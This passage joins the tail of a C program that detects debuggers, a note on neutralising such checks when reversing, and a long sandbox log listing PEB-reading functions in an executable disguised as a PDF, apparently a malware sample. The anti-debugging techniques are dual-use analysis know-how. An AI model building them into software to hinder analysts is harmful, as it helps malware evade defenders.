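    const unsigned char *peb = (const unsigned char *)__readgsqword(0x60);
#else
    const unsigned char *peb = (const unsigned char *)__readfsdword(0x30);
#endif
    return peb[2] != 0;                       /* PEB.BeingDebugged */
}

/* Kernel-side view: nonzero when a debug port is attached to this process. */
int debug_port_attached(void) {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtQueryInformationProcess_t fn = ntdll
        ? (NtQueryInformationProcess_t)GetProcAddress(ntdll, "NtQueryInformationProcess")
        : NULL;
    ULONG_PTR port = 0;
    if (fn && fn(GetCurrentProcess(), ProcessDebugPort, &port, sizeof port, NULL) == 0)
        return port != 0;
    return 0;
}

int debugger_detected(void) {
    return IsDebuggerPresent() || peb_being_debugged() || debug_port_attached();
}
#else
/* POSIX stand-in: a ptrace-attached debugger shows up as a nonzero TracerPid. */
int debugger_detected(void) {
    char buf[4096];
    FILE *f = fopen("/proc/self/status", "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_tracer_pid(buf) != 0;
}
#endif

int main(void) {
    printf("debugger detected: %s\n", debugger_detected() ? "yes" : "no");
    return 0;
}
```

When reversing a sample like this one, patching IsDebuggerPresent alone is not enough: the PEB read and the ProcessDebugPort query have to be neutralised as well (for instance by clearing PEB.BeingDebugged and hooking NtQueryInformationProcess), which is what debugger plugins that hide the debugger do.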
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code functions that read the PEB (mov <reg>, dword ptr fs:[00000030h]); register and number of such reads per function:
          0_2_026C163F: eax (1)
          0_2_026C1857: eax (1)
          2_2_00A090AF: eax (1)
          2_2_009C9080: eax (1)
          2_2_009FF0BF: ecx (1), eax (2)
          2_2_00A43884: eax (2)
          2_2_009F20A0: eax (6)
          2_2_009C58EC: eax (1)
          2_2_00A5B8D0: eax (5), ecx (1)
          2_2_009C40E1: eax (3)
          2_2_00A47016: eax (3)
          2_2_009F002D: eax (5)
          2_2_009DB02A: eax (4)
          2_2_00A94015: eax (2)
          2_2_009E0050: eax (2)
          2_2_00A82073: eax (1)
          2_2_00A91074: eax (1)
          2_2_00A469A6: eax (1)
          2_2_00A849A4: eax (4)
          2_2_009F2990: eax (1)
          2_2_009FA185: eax (1)
          2_2_00A451BE: eax (4)
          2_2_009EC182: eax (1)
          2_2_009F61A0: eax (2)
          2_2_00A541E8: eax (1)
          2_2_009CB1E1: eax (3)
          2_2_009C9100: eax (3)
          2_2_009F513A: eax (2)
          2_2_009E4120: eax (4), ecx (1)
          2_2_009EB944: eax (2)
          2_2_009CB171: eax (2)
          2_2_009CC962: eax (1)
          2_2_009FD294: eax (1)
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]2_2_009FD294
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h]2_2_009DAAB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h]2_2_009DAAB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFAB0 mov eax, dword ptr fs:[00000030h]2_2_009FFAB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2ACB mov eax, dword ptr fs:[00000030h]2_2_009F2ACB
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2AE4 mov eax, dword ptr fs:[00000030h]2_2_009F2AE4
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E3A1C mov eax, dword ptr fs:[00000030h]2_2_009E3A1C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h]2_2_009CAA16
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h]2_2_009CAA16
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h]2_2_00A04A2C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h]2_2_00A04A2C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]2_2_009C5210
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov ecx, dword ptr fs:[00000030h]2_2_009C5210
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]2_2_009C5210
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]2_2_009C5210
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D8A0A mov eax, dword ptr fs:[00000030h]2_2_009D8A0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]2_2_00A8AA16
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]2_2_00A8AA16
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]2_2_00A7B260
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]2_2_00A7B260
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98A62 mov eax, dword ptr fs:[00000030h]2_2_00A98A62
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0927A mov eax, dword ptr fs:[00000030h]2_2_00A0927A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]2_2_009C9240
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]2_2_009C9240
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]2_2_009C9240
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]2_2_009C9240
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A54257 mov eax, dword ptr fs:[00000030h]2_2_00A54257
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8EA55 mov eax, dword ptr fs:[00000030h]2_2_00A8EA55
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2397 mov eax, dword ptr fs:[00000030h]2_2_009F2397
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A95BA5 mov eax, dword ptr fs:[00000030h]2_2_00A95BA5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FB390 mov eax, dword ptr fs:[00000030h]2_2_009FB390
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]2_2_009D1B8F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]2_2_009D1B8F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8138A mov eax, dword ptr fs:[00000030h]2_2_00A8138A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7D380 mov ecx, dword ptr fs:[00000030h]2_2_00A7D380
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]2_2_009F4BAD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]2_2_009F4BAD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]2_2_009F4BAD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h]2_2_00A453CA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h]2_2_00A453CA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EDBE9 mov eax, dword ptr fs:[00000030h]2_2_009EDBE9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8131B mov eax, dword ptr fs:[00000030h]2_2_00A8131B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CF358 mov eax, dword ptr fs:[00000030h]2_2_009CF358
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CDB40 mov eax, dword ptr fs:[00000030h]2_2_009CDB40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h]2_2_009F3B7A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h]2_2_009F3B7A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98B58 mov eax, dword ptr fs:[00000030h]2_2_00A98B58
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CDB60 mov ecx, dword ptr fs:[00000030h]2_2_009CDB60
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D849B mov eax, dword ptr fs:[00000030h]2_2_009D849B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A814FB mov eax, dword ptr fs:[00000030h]2_2_00A814FB
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]2_2_00A46CF0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]2_2_00A46CF0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]2_2_00A46CF0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98CD6 mov eax, dword ptr fs:[00000030h]2_2_00A98CD6
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]2_2_00A9740D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]2_2_00A9740D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]2_2_00A9740D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]2_2_00A46C0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]2_2_00A46C0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]2_2_00A46C0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]2_2_00A46C0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FBC2C mov eax, dword ptr fs:[00000030h]2_2_009FBC2C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA44B mov eax, dword ptr fs:[00000030h]2_2_009FA44B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E746D mov eax, dword ptr fs:[00000030h]2_2_009E746D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]2_2_00A5C450
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]2_2_00A5C450
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]2_2_009FFD9B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]2_2_009FFD9B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A905AC mov eax, dword ptr fs:[00000030h]2_2_00A905AC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A905AC mov eax, dword ptr fs:[00000030h]2_2_00A905AC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]2_2_009F1DB5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]2_2_009F1DB5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]2_2_009F1DB5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F35A1 mov eax, dword ptr fs:[00000030h]2_2_009F35A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A8FDE2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A8FDE2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A8FDE2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A8FDE2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A78DF1 mov eax, dword ptr fs:[00000030h]2_2_00A78DF1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E0 mov eax, dword ptr fs:[00000030h]2_2_009DD5E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E0 mov eax, dword ptr fs:[00000030h]2_2_009DD5E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8E539 mov eax, dword ptr fs:[00000030h]2_2_00A8E539
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A4A537 mov eax, dword ptr fs:[00000030h]2_2_00A4A537
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98D34 mov eax, dword ptr fs:[00000030h]2_2_00A98D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]2_2_009F4D3B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]2_2_009F4D3B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]2_2_009F4D3B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAD30 mov eax, dword ptr fs:[00000030h]2_2_009CAD30
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E7D50 mov eax, dword ptr fs:[00000030h]2_2_009E7D50
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A03D43 mov eax, dword ptr fs:[00000030h]2_2_00A03D43
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A43540 mov eax, dword ptr fs:[00000030h]2_2_00A43540
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A73D40 mov eax, dword ptr fs:[00000030h]2_2_00A73D40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]2_2_009EC577
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]2_2_009EC577
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A446A7 mov eax, dword ptr fs:[00000030h]2_2_00A446A7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]2_2_00A90EA5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]2_2_00A90EA5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]2_2_00A90EA5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FE87 mov eax, dword ptr fs:[00000030h]2_2_00A5FE87
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F36CC mov eax, dword ptr fs:[00000030h]2_2_009F36CC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]2_2_00A7FEC0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A08EC7 mov eax, dword ptr fs:[00000030h]2_2_00A08EC7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F16E0 mov ecx, dword ptr fs:[00000030h]2_2_009F16E0
